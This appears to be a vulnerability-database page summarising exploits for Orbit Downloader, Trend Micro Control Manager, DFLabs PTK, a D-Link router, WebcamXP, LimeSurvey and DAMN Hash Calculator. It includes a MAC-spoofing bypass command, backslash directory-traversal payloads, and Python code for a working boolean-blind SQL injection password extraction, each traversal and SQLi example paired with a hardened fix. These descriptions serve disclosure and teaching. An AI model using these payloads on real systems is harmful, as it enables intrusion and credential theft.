Explore Vulnerabilities
Explore all Exploits:

Orbit Downloader URL Unicode Conversion Overflow

This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting a URL from an ASCII string to Unicode in an insecure way with MultiByteToWideChar. It is exploited with a specially crafted metalink file that must be opened in Orbit through the 'File->Add Metalink...' option.

TrendMicro Control Manager <= v5.5 CmdProcessor.exe Stack Buffer Overflow

This module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manager up to version 5.5. The flaw exists in the CmdProcessor.exe service listening on TCP port 20101, specifically in the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, attacker-controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code in the context of the user the service runs as.

DFLabs PTK <= 1.0.5 Multiple Vulnerabilities (Steal Authentication Credentials)

PTK 1.0.5 (and lower) suffers from a CSRF vulnerability which allows an attacker to force the administrator/investigator to log out of the web management interface. Furthermore, PTK's default installation (following the procedure given in PTK's 'INSTALL' file) does not redirect HTTP to HTTPS, so the connection is not protected by transport-layer encryption: by default there is no HTTPS redirection in the authentication phase, nor during other PTK activities. If an internal attacker (the nature of this tool makes it unlikely that PTK has a public IP address) mounts a man-in-the-middle attack (I carried it out successfully using Dsniff and Ettercap), the CSRF vulnerability, by forcing the administrator/investigator to log out, will help the attacker sniff the authentication credentials when the user logs in again.

D-Link DSL-2640B (ADSL Router) Authentication Bypass

D-Link DSL-2640B is an ADSL router that (among other interfaces) exposes a web management interface. This router allows an attacker to bypass authentication and log in with administrator ('admin') privileges. When the administrator is logged in, an internal attacker who connects to the web management interface (default is http://192.168.1.1:80) can see the MAC address of the logged-in admin. By simply changing his own MAC address to match it, the attacker bypasses authentication and is treated as the administrator, because the router ties the authenticated session to the client's MAC address. For example, on OS X Snow Leopard you can change your MAC address on the fly with the following CLI command: ifconfig en0 ether <admin_mac_address> (where en0 is the name of your network interface)

WebcamXP and Webcam7 Directory Traversal Vulnerability

A directory traversal vulnerability exists in WebcamXP and Webcam7 which allows an attacker to access sensitive files outside the web root directory. This vulnerability is similar to CVE-2008-5862 but uses backslashes instead of encoded forward slashes, so a filter that only looks for '../' (encoded or not) does not catch it.
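As an added example (not code from WebcamXP/Webcam7 or from the advisory), the following Python models the two filter classes: a naive resolver that decodes the request and rejects '../', which catches the %2F variant from CVE-2008-5862 but lets a backslash sequence through, beside a hardened resolver that folds both separators, normalizes the path and confines the result to the document root. The document root /srv/webcam/www and the request paths are assumptions for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the example (not the product's real layout)
WEB_ROOT = "/srv/webcam/www"


def resolve_naive(request_path: str) -> Optional[str]:
    """Model of a filter that blocks '../' (including the %2F-encoded form,
    since it decodes first) but never considers backslashes.
    Returns the path that would be opened, or None if the request is rejected."""
    decoded = unquote(request_path)
    if "../" in decoded:
        return None
    # On Windows the file API treats '\' as a separator, so a value such as
    # '..\..\..\boot.ini' still escapes the root even though this check passes.
    return WEB_ROOT + "/" + decoded.lstrip("/")


def resolve_hardened(request_path: str) -> Optional[str]:
    """Decode once, fold backslashes into forward slashes, collapse '.' and
    '..' segments, then require the result to stay under WEB_ROOT."""
    decoded = unquote(request_path).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None  # attempted escape: reject (and log it in a real server)
    return candidate


def traversal_probe(request_path: str) -> dict:
    """Run one request through both resolvers so they can be compared."""
    return {"naive": resolve_naive(request_path),
            "hardened": resolve_hardened(request_path)}


if __name__ == "__main__":
    # Constructed sample requests: a legitimate one, the encoded-slash variant
    # of CVE-2008-5862, and the backslash variant described above (raw and %5C-encoded).
    for p in ["live/index.html", "..%2F..%2Fboot.ini",
              "..\\..\\..\\boot.ini", "..%5C..%5C..%5Cboot.ini"]:
        print(repr(p), traversal_probe(p))
```

The hardened resolver decodes exactly once; double-encoded input ("%252e") is left as a literal filename and never reaches the traversal check, which is the safe direction.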

LimeSurvey Blind SQL injection

The vulnerability occurs when a user answers a survey (index.php). The session variables can be freely controlled through the following lines in save.php (l. 82): if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];} if (!isset($_POST[$pf])) {$_SESSION[$pf] = '';} Here $pf comes from user-controlled POST input (the list of field names, once split). The SQL query is then built directly from those session variables by the function createinsertquery(), provided that a special POST variable 'srid' is set both inside the 'fieldnames' variable and as a plain POST variable (query at l. 715 of save.php). The user can therefore perform blind SQL injection with specially crafted POST variables.
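As an added example, and not LimeSurvey's own code, the pattern above modeled in Python over an in-memory SQLite database: a POST-to-session copy that validates nothing, a query built by string concatenation from the session's srid, and a boolean-blind extraction loop that uses "was a row updated" as its oracle. The schema, the UPDATE keyed on srid, the pipe-separated 'fieldnames' format and the oracle are assumptions chosen to illustrate the technique; the hardened variant type-checks srid and binds every value as a parameter.

```python
import sqlite3
from typing import Callable, Dict


def setup_db() -> sqlite3.Connection:
    """Constructed schema and rows for the example; not LimeSurvey's real schema."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE saved_responses (srid INTEGER PRIMARY KEY, answer TEXT);
        CREATE TABLE users (uid INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO saved_responses VALUES (1, '');
        INSERT INTO users VALUES (1, 'h4x');
    """)
    return con


def session_from_post(post: Dict[str, str]) -> Dict[str, str]:
    """Mirror of the save.php lines: for every name $pf listed in the POST
    'fieldnames' value (assumed pipe-separated here), $_SESSION[$pf] is set
    verbatim from $_POST[$pf], or '' if absent. Nothing is validated."""
    session: Dict[str, str] = {}
    for pf in post.get("fieldnames", "").split("|"):
        session[pf] = post.get(pf, "")
    return session


def createinsertquery_vulnerable(con: sqlite3.Connection, session: Dict[str, str]) -> bool:
    """Simplified model of building the query by concatenating session values;
    'srid' lands in the WHERE clause unquoted, so it can carry arbitrary SQL."""
    sql = "UPDATE saved_responses SET answer='%s' WHERE srid=%s" % (
        session.get("answer", ""), session.get("srid", "0"))
    cur = con.execute(sql)
    return cur.rowcount > 0


def createinsertquery_hardened(con: sqlite3.Connection, session: Dict[str, str]) -> bool:
    """Fix: srid must be an integer, and all values are bound as parameters."""
    try:
        srid = int(session.get("srid", ""))
    except ValueError:
        return False
    cur = con.execute("UPDATE saved_responses SET answer=? WHERE srid=?",
                      (session.get("answer", ""), srid))
    return cur.rowcount > 0


def blind_extract_password(con: sqlite3.Connection,
                           query_fn: Callable[[sqlite3.Connection, Dict[str, str]], bool],
                           uid: int = 1, max_len: int = 8) -> str:
    """Boolean-blind extraction. The oracle is whether the UPDATE touched a row
    (in the live application this would be observed as the answer being saved
    or not). Each payload tests one character at one position."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = ("1 AND (SELECT substr(password,%d,1) FROM users WHERE uid=%d)='%s'"
                       % (pos, uid, ch))
            # srid appears both in 'fieldnames' and as its own POST variable
            post = {"fieldnames": "srid|answer", "srid": payload, "answer": "x"}
            if query_fn(con, session_from_post(post)):
                hit = ch
                break
        if hit is None:
            break  # no character matched: end of the secret
        recovered += hit
    return recovered


if __name__ == "__main__":
    print("vulnerable:", blind_extract_password(setup_db(), createinsertquery_vulnerable))
    print("hardened:  ", repr(blind_extract_password(setup_db(), createinsertquery_hardened)))
```

The extraction costs at most len(alphabet) requests per character, which is the shape of a real boolean-blind attack; the hardened function returns False for every payload because a non-numeric srid never reaches the database.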

DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC

A local heap overflow vulnerability exists in DAMN Hash Calculator v1.5.1. An attacker can exploit it by having the application import a specially crafted registry file that contains an overlong string. This causes a heap buffer overflow and may allow the attacker to execute arbitrary code on the vulnerable system.
